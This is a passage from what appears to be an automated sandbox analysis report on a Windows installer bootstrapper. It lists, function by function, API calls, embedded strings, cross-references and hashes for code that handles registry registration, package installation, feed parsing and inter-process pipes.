URLUpdateInfo, xrefs: 007D0134, 007D0147
3.10.4.4718, xrefs: 007CFFE2
ModifyPath, xrefs: 007D021D, 007D0233
%hs, xrefs: 007CFFE7
/modify, xrefs: 007D02E1, 007D02E9
%s,0, xrefs: 007D000F
NoRemove, xrefs: 007D026B, 007D027E
Failed to update resume mode., xrefs: 007D03D6
Failed to register the bundle dependency key., xrefs: 007D03BC
BundleCachePath, xrefs: 007CFECE, 007CFED3
ParentKeyName, xrefs: 007D017A, 007D018D
Contact, xrefs: 007D01CA, 007D01DD
SystemComponent, xrefs: 007D0290, 007D02A3
NoModify, xrefs: 007D01F3, 007D0206
"%ls" /modify, xrefs: 007D0218
%hu.%hu.%hu.%hu, xrefs: 007CFF85
BundleDetectCode, xrefs: 007CFF25, 007CFF2D
DisplayIcon, xrefs: 007D000A, 007D0014
QuietUninstallString, xrefs: 007D02B5, 007D02CB
HelpLink, xrefs: 007D00C2, 007D00D5
BundlePatchCode, xrefs: 007CFF43, 007CFF4B
BundleTag, xrefs: 007CFFCA, 007CFFCF
URLInfoAbout, xrefs: 007D010E, 007D0121
Failed to write %ls value., xrefs: 007D039A
DisplayVersion, xrefs: 007D0069, 007D007C
Failed to write software tags., xrefs: 007D032E
BundleUpgradeCode, xrefs: 007CFEE9, 007CFEF1
ParentDisplayName, xrefs: 007D015A, 007D016D
/uninstall, xrefs: 007D02DC
Failed to write update registration., xrefs: 007D034E
Publisher, xrefs: 007D009C, 007D00AF
Failed to create registration key., xrefs: 007CFEAE
BundleAddonCode, xrefs: 007CFF07, 007CFF0F
Comments, xrefs: 007D01A2, 007D01B5
UninstallString, xrefs: 007D02F2, 007D0308

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Close
String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.10.4.4718$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$userVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString
API String ID: 3535843008-3978993339
Opcode ID: dd31c3f9a909d5c0a2ad769d1ea8bd03895e6437df35a91bfb0d808c45fd75f5
Instruction ID: 15716370a9979391dfc57d4497c13b57b7283e30e3a57f39c67b9f9a48033f55
Opcode Fuzzy Hash: dd31c3f9a909d5c0a2ad769d1ea8bd03895e6437df35a91bfb0d808c45fd75f5
Instruction Fuzzy Hash: 31F1A231A41A26FBCF125654CD06BAE7A79FF00720F151226F910F6391D7BDADA0ABC1

Function 007C834D Relevance: 61.6, APIs: 5, Strings: 30, Instructions: 331COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,80070490,?,?,?,?,?,?,?,=S|,007EBF87,?,?,?), ref: 007C837E
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,=S|,007EBF87,?,?,?,?,=S|,Chain), ref: 007C86DB

Strings

=S|, xrefs: 007C834D
Failed to set value of variable: %ls, xrefs: 007C867E
Attempt to set built-in variable value: %ls, xrefs: 007C869F
Failed to change variant type., xrefs: 007C86B1
Initializing hidden variable '%ls', xrefs: 007C8548
Failed to set variant encryption, xrefs: 007C8674
Failed to get variable node count., xrefs: 007C83B8
Failed to select variable nodes., xrefs: 007C839B
Failed to get next node., xrefs: 007C86CD
Initializing numeric variable '%ls' to value '%ls', xrefs: 007C84B9
Variable, xrefs: 007C8388
Invalid value for @Type: %ls, xrefs: 007C864F
Failed to get @Persisted., xrefs: 007C86B8
numeric, xrefs: 007C8493
Persisted, xrefs: 007C8421
Failed to set variant value., xrefs: 007C8666
Failed to get @Id., xrefs: 007C86C6
Failed to get @Type., xrefs: 007C865F
Failed to insert variable '%ls'., xrefs: 007C859D
Type, xrefs: 007C847A
Value, xrefs: 007C843C
Hidden, xrefs: 007C8406
Initializing version variable '%ls' to value '%ls', xrefs: 007C852A
version, xrefs: 007C8503
variable.cpp, xrefs: 007C8690
Failed to find variable value '%ls'., xrefs: 007C86A9
Initializing string variable '%ls' to value '%ls', xrefs: 007C84F1
string, xrefs: 007C84CE
Failed to get @Value., xrefs: 007C866D
Failed to get @Hidden., xrefs: 007C86BF

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: =S|$Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
API String ID: 3168844106-999151996
Opcode ID: 16cc06b305dfd16b978322cf67697f71c0e69037f7b2679e9571035fc9ca525f
Instruction ID: d0611afb3e2cdec6a31acbf15cf1b6fa33287903c4cafe7c1ecb4a72d0d1391d
Opcode Fuzzy Hash: 16cc06b305dfd16b978322cf67697f71c0e69037f7b2679e9571035fc9ca525f
Instruction Fuzzy Hash: 61B1E172D00229BBCB919B94CC45FAEBB79FF44720F10025DF920B62D1DB789E509B92

Function 007E6A85 Relevance: 58.1, APIs: 7, Strings: 26, Instructions: 377COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,007DBBCA,00000007,?,?,?), ref: 007E6AD9

Part of subcall function 008009BB: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,007C5D8F,00000000), ref: 008009CF
Part of subcall function 008009BB: GetProcAddress.KERNEL32(00000000), ref: 008009D6
Part of subcall function 008009BB: GetLastError.KERNEL32(?,?,?,007C5D8F,00000000), ref: 008009ED

CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 007E6EC9
CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 007E6EDD

Strings

Failed to ensure WU service was enabled to install MSU package., xrefs: 007E6CE7
Bootstrapper application aborted during MSU progress., xrefs: 007E6E0D
D, xrefs: 007E6CF4
wusa.exe, xrefs: 007E6B59
Failed to allocate WUSA.exe path., xrefs: 007E6B6C
Failed to find Windows directory., xrefs: 007E6B18
Failed to format MSU uninstall command., xrefs: 007E6C42
Failed to append log path to MSU command-line., xrefs: 007E6C8D
Failed to append SysNative directory., xrefs: 007E6B36
SysNative\, xrefs: 007E6B23
Failed to build MSU path., xrefs: 007E6BEE
"%ls" "%ls" /quiet /norestart, xrefs: 007E6C01
Failed to find System32 directory., xrefs: 007E6B4E
Failed to get cached path for package: %ls, xrefs: 007E6BB5
"%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 007E6C2E
WixBundleExecutePackageCacheFolder, xrefs: 007E6BC4, 007E6EF5
Failed to determine WOW64 status., xrefs: 007E6AEB
2, xrefs: 007E6D6C
Failed to format MSU install command., xrefs: 007E6C15
Failed to get process exit code., xrefs: 007E6DE5
Failed to wait for executable to complete: %ls, xrefs: 007E6E58
Failed to CreateProcess on path: %ls, xrefs: 007E6D53
/log:, xrefs: 007E6C5B
Failed to get action arguments for MSU package., xrefs: 007E6B8F
msuuser.cpp, xrefs: 007E6D46, 007E6DDB, 007E6E03
Failed to append log switch to MSU command-line., xrefs: 007E6C6F

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuuser.cpp$wusa.exe
API String ID: 1400713077-4261965642
Opcode ID: 8c2438b99680787508942f690bbaf3f68ca3adc7e6748d8f2460e92b7e4fd34b
Instruction ID: 8268f62f02685994259a6135d837345ba25b32000dbae5e0c66d3631965ede63
Opcode Fuzzy Hash: 8c2438b99680787508942f690bbaf3f68ca3adc7e6748d8f2460e92b7e4fd34b
Instruction Fuzzy Hash: 4AD1A270A01359EADB119FE9CC85FEE7BB9FF18740F10403AB611E21A1D7B89E509B51

Function 007D52E3 Relevance: 52.7, APIs: 17, Strings: 13, Instructions: 222filepipesleepCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,?,0080B4F0,?,00000000,?,007C442A,?,0080B4F0), ref: 007D5304
GetCurrentProcessId.KERNEL32(?,007C442A,?,0080B4F0), ref: 007D530F
SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,007C442A,?,0080B4F0), ref: 007D5346
ConnectNamedPipe.KERNEL32(?,00000000,?,007C442A,?,0080B4F0), ref: 007D535B
GetLastError.KERNEL32(?,007C442A,?,0080B4F0), ref: 007D5365
Sleep.KERNEL32(00000064,?,007C442A,?,0080B4F0), ref: 007D5396
SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,007C442A,?,0080B4F0), ref: 007D53B9
WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,007C442A,?,0080B4F0), ref: 007D53D4
WriteFile.KERNEL32(?,*D|,0080B4F0,00000000,00000000,?,007C442A,?,0080B4F0), ref: 007D53EF
WriteFile.KERNEL32(?,comres.dll,00000004,feclient.dll,00000000,?,007C442A,?,0080B4F0), ref: 007D540A
ReadFile.KERNEL32(?,wininet.dll,00000004,feclient.dll,00000000,?,007C442A,?,0080B4F0), ref: 007D5425
GetLastError.KERNEL32(?,007C442A,?,0080B4F0), ref: 007D547D
GetLastError.KERNEL32(?,007C442A,?,0080B4F0), ref: 007D54B1
GetLastError.KERNEL32(?,007C442A,?,0080B4F0), ref: 007D54E5
GetLastError.KERNEL32(?,007C442A,?,0080B4F0), ref: 007D557B

Strings

comres.dll, xrefs: 007D5408
feclient.dll, xrefs: 007D5402, 007D541D
Failed to set pipe to non-blocking., xrefs: 007D55A5
Failed to write our process id to pipe., xrefs: 007D54DB
Failed to write secret to pipe., xrefs: 007D550F
Failed to wait for child to connect to pipe., xrefs: 007D5473
pipe.cpp, xrefs: 007D5469, 007D549D, 007D54D1, 007D5505, 007D5539, 007D556A, 007D559B
*D|, xrefs: 007D53EB
crypt32.dll, xrefs: 007D53D2
Failed to read ACK from pipe., xrefs: 007D54A7
Failed to reset pipe to blocking., xrefs: 007D5574
wininet.dll, xrefs: 007D5423
Failed to write secret length to pipe., xrefs: 007D5543

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
String ID: *D|$Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$comres.dll$crypt32.dll$feclient.dll$pipe.cpp$wininet.dll
API String ID: 2944378912-3316258469
Opcode ID: f6aa78853814a54a3690bf9c014b99a3e84aa7d2e57db9a66369a82dad5d33da
Instruction ID: 02a312f30a451cfcd6c7f0608063576e1e69672b7213ec9fb0088c488c28fc06
Opcode Fuzzy Hash: f6aa78853814a54a3690bf9c014b99a3e84aa7d2e57db9a66369a82dad5d33da
Instruction Fuzzy Hash: F661C4B2E40725ABE7109AA98D85FEAB6FDFF04740F114126FD15E7280E7698E4086E1

Function 008072F4 Relevance: 45.8, APIs: 13, Strings: 13, Instructions: 340COMMON

Download Yara Rule

APIs

Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 00807407
SysFreeString.OLEAUT32(00000000), ref: 008075D0
SysFreeString.OLEAUT32(00000000), ref: 0080766D

Strings

author, xrefs: 00807345, 008074D6
(, xrefs: 008075AB
atomutil.cpp, xrefs: 00807321, 00807657
logo, xrefs: 0080745A
title, xrefs: 00807492
category, xrefs: 00807362, 0080750F
icon, xrefs: 0080741E
generator, xrefs: 008073FA
link, xrefs: 0080739C, 0080757E
entry, xrefs: 0080737F, 00807548
subtitle, xrefs: 00807476
@, xrefs: 00807576
updated, xrefs: 008074AE

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: String$FreeHeap$AllocateCompareProcess
String ID: ($@$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
API String ID: 1555028553-2592408802
Opcode ID: 3e22bfede0273f6800fefca5effa39441b29293ab0017ab600e527adc33407c0
Instruction ID: f733af1493973c700ed76af4bc59cb071bb8be670e572fed57eb57f59e20ffa5
Opcode Fuzzy Hash: 3e22bfede0273f6800fefca5effa39441b29293ab0017ab600e527adc33407c0
Instruction Fuzzy Hash: 4FB18D71D4862ABBDB619B58CC81FAEBA64FB14720F200354F532E62D1DB71FA50DB90

Function 00806FB7 Relevance: 45.8, APIs: 11, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,00823C78,000000FF,?,?,?), ref: 0080707E
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 008070A3
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 008070C3
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 008070DF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 00807107
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00807123
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 0080715C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 00807195

Part of subcall function 00806BF6: SysFreeString.OLEAUT32(00000000), ref: 00806D2F
Part of subcall function 00806BF6: SysFreeString.OLEAUT32(00000000), ref: 00806D71

SysFreeString.OLEAUT32(00000000), ref: 00807219
SysFreeString.OLEAUT32(00000000), ref: 008072C9

Strings

feclient.dll, xrefs: 008070B0
author, xrefs: 00806FE2, 00807115
atomutil.cpp, xrefs: 008072B6
(, xrefs: 008071F4
summary, xrefs: 00807095
content, xrefs: 00807187
title, xrefs: 008070B5
category, xrefs: 00806FFF, 0080714E
msi.dll, xrefs: 00806FE1
clbcatq.dll, xrefs: 008070EC
cabinet.dll, xrefs: 00806FFA
link, xrefs: 0080701C, 008071C7
version.dll, xrefs: 00806FDD
published, xrefs: 008070D1
updated, xrefs: 008070F9

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: String$Compare$Free
String ID: ($atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
API String ID: 318886736-4294603148
Opcode ID: a600512333c4268f33fd64bf8a2ceb1dbc16f4b19c3ffcc993dcc8350a1fdd7d
Instruction ID: 1d94553f2697057479850a64c9aa306c33afe9707039c0afe782e6dedc2b0b17
Opcode Fuzzy Hash: a600512333c4268f33fd64bf8a2ceb1dbc16f4b19c3ffcc993dcc8350a1fdd7d
Instruction Fuzzy Hash: 06A16C31D4822AFBDB619B94CC41FA9B764FB14720F204355F522E62D1D770BA60DBA1

Function 007CA311 Relevance: 44.0, APIs: 8, Strings: 17, Instructions: 299registryCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 007CA356
_MREFOpen@16.MSPDB140-MSVCRT ref: 007CA37C
RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 007CA666

Strings

Failed to format value string., xrefs: 007CA387
Registry key not found. Key = '%ls', xrefs: 007CA3B0
RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 007CA63E
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 007CA418
Failed to clear variable., xrefs: 007CA3D4
Failed to set variable., xrefs: 007CA629
Failed to query registry key value size., xrefs: 007CA454
Failed to query registry key value., xrefs: 007CA4D8
Unsupported registry key value type. Type = '%u', xrefs: 007CA506
search.cpp, xrefs: 007CA44A, 007CA47D, 007CA4CE, 007CA5D1
Failed to read registry value., xrefs: 007CA5F4
Failed to change value type., xrefs: 007CA60D
Failed to open registry key., xrefs: 007CA3E9
Failed to allocate memory registry value., xrefs: 007CA487
Failed to format key string., xrefs: 007CA361
Failed to allocate string buffer., xrefs: 007CA565
Failed to get expand environment string., xrefs: 007CA5DB

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Open@16$Close
String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
API String ID: 2348241696-3124384294
Opcode ID: baede4bc0d5ec73052b66ed22ad0bbe28504fa50aff714f8ceb1a2b8d34428c4
Instruction ID: f6635e5e1e6401b6cd82b7d0a98096e59f64b8732c0fd5ca1628ab3173af84c7
Opcode Fuzzy Hash: baede4bc0d5ec73052b66ed22ad0bbe28504fa50aff714f8ceb1a2b8d34428c4
Instruction Fuzzy Hash: C7A1B172E4022DFBDF119AA4CC45FAE7BB9FB04315F14852DF910F6290D7798A109BA2

Function 007ED22C Relevance: 44.0, APIs: 10, Strings: 15, Instructions: 276processCOMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 007ED2A7
StringFromGUID2.OLE32(?,?,00000027), ref: 007ED2D0
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 007ED3BC
GetLastError.KERNEL32(?,?,?,?), ref: 007ED3C6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 007ED45B
GetExitCodeProcess.KERNEL32(?,?), ref: 007ED485
GetLastError.KERNEL32(?,?,?,?), ref: 007ED493
GetLastError.KERNEL32(?,?,?,?), ref: 007ED4CB

Part of subcall function 007ED12C: WaitForSingleObject.KERNEL32(?,000000FF,762330B0,00000000,?,?,?,?,007ED439,?), ref: 007ED145
Part of subcall function 007ED12C: ReleaseMutex.KERNEL32(?,?,?,?,007ED439,?), ref: 007ED161
Part of subcall function 007ED12C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 007ED1A4
Part of subcall function 007ED12C: ReleaseMutex.KERNEL32(?), ref: 007ED1BB
Part of subcall function 007ED12C: SetEvent.KERNEL32(?), ref: 007ED1C4

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 007ED580
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 007ED598

Strings

Failed to allocate event name., xrefs: 007ED333
Failed to allocate section name., xrefs: 007ED311
Failed to create netfx chainer., xrefs: 007ED352
Failed to get netfx return code., xrefs: 007ED4C1
D, xrefs: 007ED3A1
Failed to process netfx chainer message., xrefs: 007ED43F
NetFxEvent.%ls, xrefs: 007ED31F
Failed to wait for netfx chainer process to complete, xrefs: 007ED4F9
NetFxChainer.cpp, xrefs: 007ED2E5, 007ED3EA, 007ED4B7, 007ED4EF
Failed to CreateProcess on path: %ls, xrefs: 007ED3F5
NetFxSection.%ls, xrefs: 007ED2FD
%ls /pipe %ls, xrefs: 007ED373
Failed to convert netfx chainer guid into string., xrefs: 007ED2EF
Failed to create netfx chainer guid., xrefs: 007ED2B4
Failed to allocate netfx chainer arguments., xrefs: 007ED387

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLastWait$CloseCreateHandleMutexObjectProcessReleaseSingle$CodeEventExitFromMultipleObjectsStringUuid
String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
API String ID: 2531618940-1825855094
Opcode ID: 99d4782dd397f40eb1dfca70de586dd81c6b20f941a80711d386cc729541f2ba
Instruction ID: 2958200277407d300cc782ff148db07dbf832b8988e758d50f0c25e4acb60c19
Opcode Fuzzy Hash: 99d4782dd397f40eb1dfca70de586dd81c6b20f941a80711d386cc729541f2ba
Instruction Fuzzy Hash: E0A1A071D01368EBEB309BA5DC45BAEB7B8FB08310F104069E909F7292D7789E448F91

Function 007C567D Relevance: 42.5, APIs: 5, Strings: 19, Instructions: 476stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000002C0,00000100,00000100,00000000,00000000,?,007C99BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 007C56A2
lstrlenW.KERNEL32(00000000,?,007C99BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 007C56AC
_wcschr.LIBVCRUNTIME ref: 007C58B4
LeaveCriticalSection.KERNEL32(000002C0,00000000,00000000,00000000,00000000,00000000,00000001,?,007C99BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0), ref: 007C5B56

Strings

Failed to allocate string., xrefs: 007C5AD1
Failed to set record string., xrefs: 007C5AA2
[%d], xrefs: 007C586F
Failed to append string., xrefs: 007C5728
Failed to format record., xrefs: 007C5B1A
Failed to allocate buffer for format string., xrefs: 007C56CA
variable.cpp, xrefs: 007C590A, 007C592B, 007C5984, 007C59D0, 007C5A60, 007C5A95, 007C5B0D
*****, xrefs: 007C5820
Failed to append placeholder., xrefs: 007C5959
Failed to set variable value., xrefs: 007C596D
Failed to reallocate variable array., xrefs: 007C5938
Failed to allocate record., xrefs: 007C5917
Failed to allocate variable array., xrefs: 007C5991
Failed to determine variable visibility: '%ls'., xrefs: 007C5946
Failed to get formatted length., xrefs: 007C5A6D
Failed to get variable name., xrefs: 007C5998
Failed to copy string., xrefs: 007C5B3A
Failed to set record format string., xrefs: 007C59DD
Failed to format placeholder string., xrefs: 007C5963

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave_wcschrlstrlen
String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
API String ID: 1026845265-2050445661
Opcode ID: 9e5977ad098cc6cd9a115a168ee8f58e15402d776f8fe668aeb9dfa2927509c4
Instruction ID: 838717363038c90dbc9f4b615b730f0e8f356ddb1d4488e7cbd9b8559838e52f
